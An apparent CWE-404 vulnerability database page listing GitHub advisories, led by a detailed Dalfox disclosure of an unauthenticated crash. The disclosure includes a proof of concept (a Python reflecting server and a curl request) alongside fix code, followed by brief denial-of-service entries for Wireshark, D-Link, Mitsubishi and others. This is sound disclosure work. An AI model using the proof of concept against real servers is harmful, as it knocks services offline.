Common Weakness Enumeration

CWE-404

Allowed-with-Review

Improper Resource Shutdown or Release

Abstraction: Class · Status: Draft

The product does not release or incorrectly releases a resource before it is made available for re-use.

1219 vulnerabilities reference this CWE, most recent first.

GHSA-2G4X-FQ3J-CGQ4

Vulnerability from github – Published: 2026-05-12 15:08 – Updated: 2026-06-08 20:12
VLAI
Summary
Dalfox has an Unauthenticated Remote DoS via Closed-Channel Write in `ParameterAnalysis` (server mode)
Details

Summary

ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage — which processes POST-body parameters (dp) — is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != "" (i.e., the attacker supplies the data field) and the target reflects at least one parameter.

Severity

High (CVSS 3.1: 7.5)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

  • Attack Vector: Network — server binds to 0.0.0.0:6664 by default; reachable by any network peer.
  • Attack Complexity: Low — the attacker controls both trigger conditions: the data field that populates the second stage's work queue, and the target URL they point at a reflective server they control.
  • Privileges Required: None — --api-key defaults to "", so no auth middleware is registered.
  • User Interaction: None.
  • Scope: Unchanged — a goroutine panic without a recover terminates the entire Go process; the impact stays within the dalfox process authority.
  • Confidentiality Impact: None.
  • Integrity Impact: None.
  • Availability Impact: High — the entire dalfox server process crashes, requiring manual restart. A single well-timed request is sufficient.

Note on PR #917: Commit 8a424d1 (fix: resolve data race and nil pointer panic in processParams) fixed two concurrent-safety bugs in processParams — a data race on paramResult.Chars and a nil pointer dereference on resp.Header. It did not fix the closed-channel panic reported here, which is a structural ordering bug in ParameterAnalysis itself, not inside processParams.

Affected Component

  • pkg/scanning/parameterAnalysis.goParameterAnalysis() (lines 436–448): results channel closed at line 438, then passed to second-stage processParams workers at line 445
  • pkg/scanning/parameterAnalysis.goprocessParams() (line 299): results <- paramResult panics when results is closed

CWE

  • CWE-362: Concurrent Execution Using Shared Resource with Improper Synchronization ('Race Condition') — channel lifecycle ordering error
  • CWE-404: Improper Resource Shutdown or Release

Description

Two-Stage Channel Lifecycle Ordering Error

ParameterAnalysis allocates a single results channel shared by both worker stages:

// pkg/scanning/parameterAnalysis.go:397-408
paramsQue := make(chan string, concurrency)
results := make(chan model.ParamResult, concurrency)   // ← single channel for both stages

go func() {
    for result := range results {   // consumer exits when results is closed
        mutex.Lock()
        params[result.Name] = result
        mutex.Unlock()
    }
}()

First stage (URL parameters in p):

// lines 410-437
for i := 0; i < concurrency; i++ {
    wgg.Add(1)
    go func() {
        processParams(target, paramsQue, results, options, rl, miningCheckerLine, pLog)
        wgg.Done()
    }()
}
// ... feed paramsQue ...
close(paramsQue)
wgg.Wait()
close(results)   // ← line 438: results is now closed; consumer goroutine exits

Second stage (POST-body parameters in dp):

// lines 440-448
var wggg sync.WaitGroup
paramsDataQue := make(chan string, concurrency)
for j := 0; j < concurrency; j++ {
    wggg.Add(1)
    go func() {
        processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)
        //                                   ^^^^^^^ — same closed channel
        wggg.Done()
    }()
}

When a second-stage worker finds a reflected parameter, processParams sends to the closed channel:

// pkg/scanning/parameterAnalysis.go:299
results <- paramResult   // panic: send on closed channel

A Go runtime panic in a goroutine without a recover terminates the entire program. In server mode, this kills the dalfox API server process.

Trigger Conditions Are Both Attacker-Controlled

Condition 1 — dp is non-empty: dp (the POST-body parameter map) is populated in addParamsFromWordlistsetP whenever options.Data != "":

// parameterAnalysis.go:41-45
if options.Data != "" {
    if dp.Get(name) == "" {
        dp.Set(name, "")
    }
}

The attacker sets "data": "q=test" in the JSON body, which propagates through Initialize (lib/func.go:106). With "mining-dict": true, the entire GF-XSS wordlist (hundreds of parameters) flows into dp, ensuring the second stage has ample work.

Condition 2 — a parameter is reflected: processParams sends to results only when vrs (verified reflection) is true (line 252 → line 299). The attacker controls the target URL — they point it at a server they operate that reflects any query parameter, guaranteeing vrs = true on the first matching entry from the wordlist.

PR #917 Fixed Different Bugs

Commit 8a424d1 addressed: 1. Data race: concurrent append(paramResult.Chars, char) with no mutex → added charsMu sync.Mutex 2. Nil pointer: resp.Header accessed when resp == nil → added && resp != nil guard

Neither change touches the channel lifecycle in ParameterAnalysis. The closed-channel panic is independent and remains unpatched.

Proof of Concept

# Step 1 — Attacker-controlled reflective server
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
    def _h(self):
        qs = parse_qs(urlparse(self.path).query)
        n = int(self.headers.get('Content-Length', '0'))
        body = self.rfile.read(n).decode() if n else ''
        bq = parse_qs(body)
        v = qs.get('q', [''])[0] or bq.get('q', [''])[0]
        out = f'<html><body>{v}</body></html>'.encode()
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(out)))
        self.end_headers()
        self.wfile.write(out)
    def do_GET(self): self._h()
    def do_POST(self): self._h()
    def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18083), H).serve_forever()
PY

# Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest

# Step 3 — Single unauthenticated request terminates the server process
curl -s -X POST http://127.0.0.1:16664/scan \
  -H 'Content-Type: application/json' \
  --data '{
    "url": "http://127.0.0.1:18083/?q=test",
    "options": {
      "data": "q=test",
      "mining-dict": true,
      "use-headless": false,
      "worker": 1
    }
  }'

# Expected: dalfox process exits immediately with:
# goroutine N [running]:
# panic: send on closed channel
#   pkg/scanning/parameterAnalysis.go:299 +0x...

# Step 4 — Verify server is down
curl -s http://127.0.0.1:16664/health
# Expected: connection refused

No X-API-KEY header is required. The reflective server is attacker-controlled and guarantees the vrs = true condition that triggers the channel write.

Impact

  • Complete server process crash on a single unauthenticated POST request — no login, no API key, no special permissions required.
  • All in-flight scans are lost without results.
  • The server requires a manual restart; under automated process managers (systemd, Docker --restart=always) repeated triggering can create a denial-of-service loop.
  • The attack requires only network access to port 6664 and a reflective HTTP server reachable by the dalfox instance — both attacker-controlled conditions.

Recommended Remediation

Option 1: Allocate a fresh results channel for the second stage (preferred)

The simplest and most direct fix: give each stage its own channel and consumer. The second stage should not reuse a channel that was created and closed for the first stage.

// pkg/scanning/parameterAnalysis.go — replace the second stage block:

var wggg sync.WaitGroup
paramsDataQue := make(chan string, concurrency)
results2 := make(chan model.ParamResult, concurrency)   // fresh channel

go func() {
    for result := range results2 {
        mutex.Lock()
        params[result.Name] = result
        mutex.Unlock()
    }
}()

for j := 0; j < concurrency; j++ {
    wggg.Add(1)
    go func() {
        processParams(target, paramsDataQue, results2, options, rl, miningCheckerLine, pLog)
        wggg.Done()
    }()
}

// ... feed paramsDataQue ...
close(paramsDataQue)
wggg.Wait()
close(results2)   // close after all writers are done

Option 2: Merge both parameter maps before the single worker stage

Process p and dp entries through a single shared paramsQue and results, eliminating the two-stage design:

// Before the worker loop, merge dp into p (or into a unified queue):
for k := range dp {
    // feed to the same paramsQue along with p entries
}
// Then run a single close(paramsQue) → wgg.Wait() → close(results)

This is a more invasive refactor but removes the structural root cause. The current two-stage design is the fundamental source of the ordering bug.

Option 3: Add a recover in processParams goroutines (stopgap only)

Catching the panic prevents the process from crashing but does not fix the lost results or the channel invariant violation. Recommended only as a temporary defensive measure while the channel lifecycle is corrected:

go func() {
    defer func() {
        if r := recover(); r != nil {
            printing.DalLog("ERROR", fmt.Sprintf("processParams panic recovered: %v", r), options)
        }
        wggg.Done()
    }()
    processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)
}()

Option 1 is the recommended primary fix. Option 3 should be combined with Option 1, not used as a substitute.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.12.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hahwul/dalfox/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hahwul/dalfox"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45090"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362",
      "CWE-404"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-12T15:08:40Z",
    "nvd_published_at": "2026-05-27T18:16:25Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`ParameterAnalysis` in `pkg/scanning/parameterAnalysis.go` runs two sequential worker stages that both write to the same `results` channel. The channel is correctly closed after the first stage completes (`close(results)` at line 438), but the second stage \u2014 which processes POST-body parameters (`dp`) \u2014 is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, `processParams` executes `results \u003c- paramResult` on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever `options.Data != \"\"` (i.e., the attacker supplies the `data` field) and the target reflects at least one parameter.\n\n## Severity\n\n**High** (CVSS 3.1: 7.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n- **Attack Vector:** Network \u2014 server binds to `0.0.0.0:6664` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 the attacker controls both trigger conditions: the `data` field that populates the second stage\u0027s work queue, and the target URL they point at a reflective server they control.\n- **Privileges Required:** None \u2014 `--api-key` defaults to `\"\"`, so no auth middleware is registered.\n- **User Interaction:** None.\n- **Scope:** Unchanged \u2014 a goroutine panic without a `recover` terminates the entire Go process; the impact stays within the dalfox process authority.\n- **Confidentiality Impact:** None.\n- **Integrity Impact:** None.\n- **Availability Impact:** High \u2014 the entire dalfox server process crashes, requiring manual restart. A single well-timed request is sufficient.\n\n**Note on PR #917**: Commit `8a424d1` (`fix: resolve data race and nil pointer panic in processParams`) fixed two concurrent-safety bugs in `processParams` \u2014 a data race on `paramResult.Chars` and a nil pointer dereference on `resp.Header`. It did **not** fix the closed-channel panic reported here, which is a structural ordering bug in `ParameterAnalysis` itself, not inside `processParams`.\n\n## Affected Component\n\n- `pkg/scanning/parameterAnalysis.go` \u2014 `ParameterAnalysis()` (lines 436\u2013448): `results` channel closed at line 438, then passed to second-stage `processParams` workers at line 445\n- `pkg/scanning/parameterAnalysis.go` \u2014 `processParams()` (line 299): `results \u003c- paramResult` panics when `results` is closed\n\n## CWE\n\n- **CWE-362**: Concurrent Execution Using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) \u2014 channel lifecycle ordering error\n- **CWE-404**: Improper Resource Shutdown or Release\n\n## Description\n\n### Two-Stage Channel Lifecycle Ordering Error\n\n`ParameterAnalysis` allocates a single `results` channel shared by both worker stages:\n\n```go\n// pkg/scanning/parameterAnalysis.go:397-408\nparamsQue := make(chan string, concurrency)\nresults := make(chan model.ParamResult, concurrency)   // \u2190 single channel for both stages\n\ngo func() {\n    for result := range results {   // consumer exits when results is closed\n        mutex.Lock()\n        params[result.Name] = result\n        mutex.Unlock()\n    }\n}()\n```\n\n**First stage** (URL parameters in `p`):\n\n```go\n// lines 410-437\nfor i := 0; i \u003c concurrency; i++ {\n    wgg.Add(1)\n    go func() {\n        processParams(target, paramsQue, results, options, rl, miningCheckerLine, pLog)\n        wgg.Done()\n    }()\n}\n// ... feed paramsQue ...\nclose(paramsQue)\nwgg.Wait()\nclose(results)   // \u2190 line 438: results is now closed; consumer goroutine exits\n```\n\n**Second stage** (POST-body parameters in `dp`):\n\n```go\n// lines 440-448\nvar wggg sync.WaitGroup\nparamsDataQue := make(chan string, concurrency)\nfor j := 0; j \u003c concurrency; j++ {\n    wggg.Add(1)\n    go func() {\n        processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)\n        //                                   ^^^^^^^ \u2014 same closed channel\n        wggg.Done()\n    }()\n}\n```\n\nWhen a second-stage worker finds a reflected parameter, `processParams` sends to the closed channel:\n\n```go\n// pkg/scanning/parameterAnalysis.go:299\nresults \u003c- paramResult   // panic: send on closed channel\n```\n\nA Go runtime panic in a goroutine without a `recover` terminates the entire program. In server mode, this kills the dalfox API server process.\n\n### Trigger Conditions Are Both Attacker-Controlled\n\n**Condition 1 \u2014 `dp` is non-empty**: `dp` (the POST-body parameter map) is populated in `addParamsFromWordlist` \u2192 `setP` whenever `options.Data != \"\"`:\n\n```go\n// parameterAnalysis.go:41-45\nif options.Data != \"\" {\n    if dp.Get(name) == \"\" {\n        dp.Set(name, \"\")\n    }\n}\n```\n\nThe attacker sets `\"data\": \"q=test\"` in the JSON body, which propagates through `Initialize` (`lib/func.go:106`). With `\"mining-dict\": true`, the entire GF-XSS wordlist (hundreds of parameters) flows into `dp`, ensuring the second stage has ample work.\n\n**Condition 2 \u2014 a parameter is reflected**: `processParams` sends to `results` only when `vrs` (verified reflection) is true (line 252 \u2192 line 299). The attacker controls the target URL \u2014 they point it at a server they operate that reflects any query parameter, guaranteeing `vrs = true` on the first matching entry from the wordlist.\n\n### PR #917 Fixed Different Bugs\n\nCommit `8a424d1` addressed:\n1. Data race: concurrent `append(paramResult.Chars, char)` with no mutex \u2192 added `charsMu sync.Mutex`\n2. Nil pointer: `resp.Header` accessed when `resp == nil` \u2192 added `\u0026\u0026 resp != nil` guard\n\nNeither change touches the channel lifecycle in `ParameterAnalysis`. The closed-channel panic is independent and remains unpatched.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Attacker-controlled reflective server\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n    def _h(self):\n        qs = parse_qs(urlparse(self.path).query)\n        n = int(self.headers.get(\u0027Content-Length\u0027, \u00270\u0027))\n        body = self.rfile.read(n).decode() if n else \u0027\u0027\n        bq = parse_qs(body)\n        v = qs.get(\u0027q\u0027, [\u0027\u0027])[0] or bq.get(\u0027q\u0027, [\u0027\u0027])[0]\n        out = f\u0027\u003chtml\u003e\u003cbody\u003e{v}\u003c/body\u003e\u003c/html\u003e\u0027.encode()\n        self.send_response(200)\n        self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n        self.send_header(\u0027Content-Length\u0027, str(len(out)))\n        self.end_headers()\n        self.wfile.write(out)\n    def do_GET(self): self._h()\n    def do_POST(self): self._h()\n    def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18083), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox REST server (default: no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 Single unauthenticated request terminates the server process\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\n    \"url\": \"http://127.0.0.1:18083/?q=test\",\n    \"options\": {\n      \"data\": \"q=test\",\n      \"mining-dict\": true,\n      \"use-headless\": false,\n      \"worker\": 1\n    }\n  }\u0027\n\n# Expected: dalfox process exits immediately with:\n# goroutine N [running]:\n# panic: send on closed channel\n#   pkg/scanning/parameterAnalysis.go:299 +0x...\n\n# Step 4 \u2014 Verify server is down\ncurl -s http://127.0.0.1:16664/health\n# Expected: connection refused\n```\n\nNo `X-API-KEY` header is required. The reflective server is attacker-controlled and guarantees the `vrs = true` condition that triggers the channel write.\n\n## Impact\n\n- **Complete server process crash** on a single unauthenticated POST request \u2014 no login, no API key, no special permissions required.\n- All in-flight scans are lost without results.\n- The server requires a manual restart; under automated process managers (systemd, Docker `--restart=always`) repeated triggering can create a denial-of-service loop.\n- The attack requires only network access to port 6664 and a reflective HTTP server reachable by the dalfox instance \u2014 both attacker-controlled conditions.\n\n## Recommended Remediation\n\n### Option 1: Allocate a fresh `results` channel for the second stage (preferred)\n\nThe simplest and most direct fix: give each stage its own channel and consumer. The second stage should not reuse a channel that was created and closed for the first stage.\n\n```go\n// pkg/scanning/parameterAnalysis.go \u2014 replace the second stage block:\n\nvar wggg sync.WaitGroup\nparamsDataQue := make(chan string, concurrency)\nresults2 := make(chan model.ParamResult, concurrency)   // fresh channel\n\ngo func() {\n    for result := range results2 {\n        mutex.Lock()\n        params[result.Name] = result\n        mutex.Unlock()\n    }\n}()\n\nfor j := 0; j \u003c concurrency; j++ {\n    wggg.Add(1)\n    go func() {\n        processParams(target, paramsDataQue, results2, options, rl, miningCheckerLine, pLog)\n        wggg.Done()\n    }()\n}\n\n// ... feed paramsDataQue ...\nclose(paramsDataQue)\nwggg.Wait()\nclose(results2)   // close after all writers are done\n```\n\n### Option 2: Merge both parameter maps before the single worker stage\n\nProcess `p` and `dp` entries through a single shared `paramsQue` and `results`, eliminating the two-stage design:\n\n```go\n// Before the worker loop, merge dp into p (or into a unified queue):\nfor k := range dp {\n    // feed to the same paramsQue along with p entries\n}\n// Then run a single close(paramsQue) \u2192 wgg.Wait() \u2192 close(results)\n```\n\nThis is a more invasive refactor but removes the structural root cause. The current two-stage design is the fundamental source of the ordering bug.\n\n### Option 3: Add a `recover` in processParams goroutines (stopgap only)\n\nCatching the panic prevents the process from crashing but does not fix the lost results or the channel invariant violation. Recommended only as a temporary defensive measure while the channel lifecycle is corrected:\n\n```go\ngo func() {\n    defer func() {\n        if r := recover(); r != nil {\n            printing.DalLog(\"ERROR\", fmt.Sprintf(\"processParams panic recovered: %v\", r), options)\n        }\n        wggg.Done()\n    }()\n    processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)\n}()\n```\n\nOption 1 is the recommended primary fix. Option 3 should be combined with Option 1, not used as a substitute.\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
  "id": "GHSA-2g4x-fq3j-cgq4",
  "modified": "2026-06-08T20:12:46Z",
  "published": "2026-05-12T15:08:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-2g4x-fq3j-cgq4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45090"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hahwul/dalfox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dalfox has an Unauthenticated Remote DoS via Closed-Channel Write in `ParameterAnalysis` (server mode)"
}

GHSA-2GGG-6J2G-7JFC

Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-01 18:30
VLAI
Details

Crash in the EAP dissector in Wireshark 4.0.0 to 4.0.2 allows denial of service via packet injection or crafted capture file

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0414"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-26T21:18:00Z",
    "severity": "MODERATE"
  },
  "details": "Crash in the EAP dissector in Wireshark 4.0.0 to 4.0.2 allows denial of service via packet injection or crafted capture file",
  "id": "GHSA-2ggg-6j2g-7jfc",
  "modified": "2023-02-01T18:30:25Z",
  "published": "2023-01-26T21:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0414"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-0414.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/wireshark/wireshark/-/issues/18622"
    },
    {
      "type": "WEB",
      "url": "https://www.wireshark.org/security/wnpa-sec-2023-01.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2GX4-FPH4-HGJX

Vulnerability from github – Published: 2025-01-16 00:31 – Updated: 2025-01-16 00:31
VLAI
Details

A vulnerability has been found in D-Link DIR-823X 240126/240802 and classified as critical. Affected by this vulnerability is the function FUN_00412244. The manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0492"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-15T22:15:27Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been found in D-Link DIR-823X 240126/240802 and classified as critical. Affected by this vulnerability is the function FUN_00412244. The manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-2gx4-fph4-hgjx",
  "modified": "2025-01-16T00:31:22Z",
  "published": "2025-01-16T00:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0492"
    },
    {
      "type": "WEB",
      "url": "https://tasty-foxtrot-3a8.notion.site/D-link-DIR-823X-FUN_00412244-NULL-Pointer-Dereference-1730448e619580fcb7f9d871c6e7190a"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.291937"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.291937"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.475301"
    },
    {
      "type": "WEB",
      "url": "https://www.dlink.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2H63-M6JF-2CM7

Vulnerability from github – Published: 2024-01-19 00:30 – Updated: 2024-01-19 00:30
VLAI
Details

A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0695"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-18T23:15:08Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-2h63-m6jf-2cm7",
  "modified": "2024-01-19T00:30:23Z",
  "published": "2024-01-19T00:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0695"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.251480"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.251480"
    },
    {
      "type": "WEB",
      "url": "https://www.exploitalert.com/view-details.html?id=40072"
    },
    {
      "type": "WEB",
      "url": "https://www.youtube.com/watch?v=nGyS2Rp5aEo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2J9M-JH56-7553

Vulnerability from github – Published: 2022-12-23 03:30 – Updated: 2023-01-04 21:30
VLAI
Details

Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V all versions, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW all versions allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-33324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-23T03:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions \"32\" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions \"65\" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V all versions, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW all versions allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.",
  "id": "GHSA-2j9m-jh56-7553",
  "modified": "2023-01-04T21:30:17Z",
  "published": "2022-12-23T03:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33324"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/vu/JVNVU96883262"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-356-03"
    },
    {
      "type": "WEB",
      "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2022-018_en.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2JR3-QR9J-QXG7

Vulnerability from github – Published: 2026-02-07 21:30 – Updated: 2026-02-07 21:30
VLAI
Details

A vulnerability was determined in jsbroks COCO Annotator up to 0.11.1. This impacts an unknown function of the file /api/info/long_task of the component Endpoint. This manipulation causes denial of service. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2108"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-07T19:15:46Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was determined in jsbroks COCO Annotator up to 0.11.1. This impacts an unknown function of the file /api/info/long_task of the component Endpoint. This manipulation causes denial of service. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-2jr3-qr9j-qxg7",
  "modified": "2026-02-07T21:30:17Z",
  "published": "2026-02-07T21:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2108"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nmmorette/vulnerability-research/blob/main/coco-anotator/Unauthenticated%20Task%20Queue%20Flood%20in%20COCO%20Annotator%202f1ef09b873680f99d39e3f7db9886fa.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.344684"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.344684"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.745547"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2PPG-9297-H3VC

Vulnerability from github – Published: 2025-05-08 00:31 – Updated: 2025-05-08 00:31
VLAI
Details

